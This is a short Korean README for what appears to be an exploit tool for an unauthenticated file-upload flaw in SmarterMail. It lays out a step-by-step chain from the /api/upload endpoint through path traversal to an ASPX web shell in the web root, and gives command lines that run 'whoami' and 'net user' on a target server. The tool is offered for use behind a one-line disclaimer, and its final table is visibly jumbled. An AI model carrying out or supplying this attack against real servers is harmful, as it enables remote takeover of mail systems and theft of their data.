
SmarterMail 무인증 임의 파일 업로드 익스플로잇으로, ASPX 웹셸 배포를 통한 원격 코드 실행으로 이어집니다.
SmarterMail 인증 없는 임의 파일 업로드 원격 코드 실행 (RCE)
인증 없는 임의 파일 업로드로 원격 코드 실행이 가능한 치명적인 취약점입니다.
| 필드 | 값 |
|---|---|
| 제품 | SmarterMail |
| 영향받는 버전 | 빌드 9406 및 이전 버전 |
| CVSS | 10.0 (치명적) |
| 유형 | 임의 파일 업로드 |
| 벡터 | HTTP (인증 없음) |
| 영향 | 원격 코드 실행 |
flowchart LR
A[Attacker] --> B["Find Upload Endpoint"]
B --> C["/api/upload"]
C --> D["Upload ASPX Shell"]
D --> E["Path Traversal"]
E --> F["../wwwroot/"]
F --> G["Access Shell"]
G --> H["RCE as IIS User"]이 취약점으로 인해 인증되지 않은 공격자는 서버의 임의 위치에 파일을 업로드할 수 있습니다. ASPX 웹쉘을 웹 루트에 업로드하여 코드 실행을 달성할 수 있습니다.
공격 단계:
python exploit.py https://mail.target.com
python exploit.py https://mail.target.com -c "whoami"
python exploit.py https://mail.target.com -c "net user"
| 플래그 | 설명 | 기본값 |
|---|---|---|
-c, --command | 실행할 명령 | none |
-t, --timeout | 요청 시간 초과 |
requests
승인된 보안 테스트 전용입니다.
| 30 |
--check-only | 활성 상태인지만 확인 | off |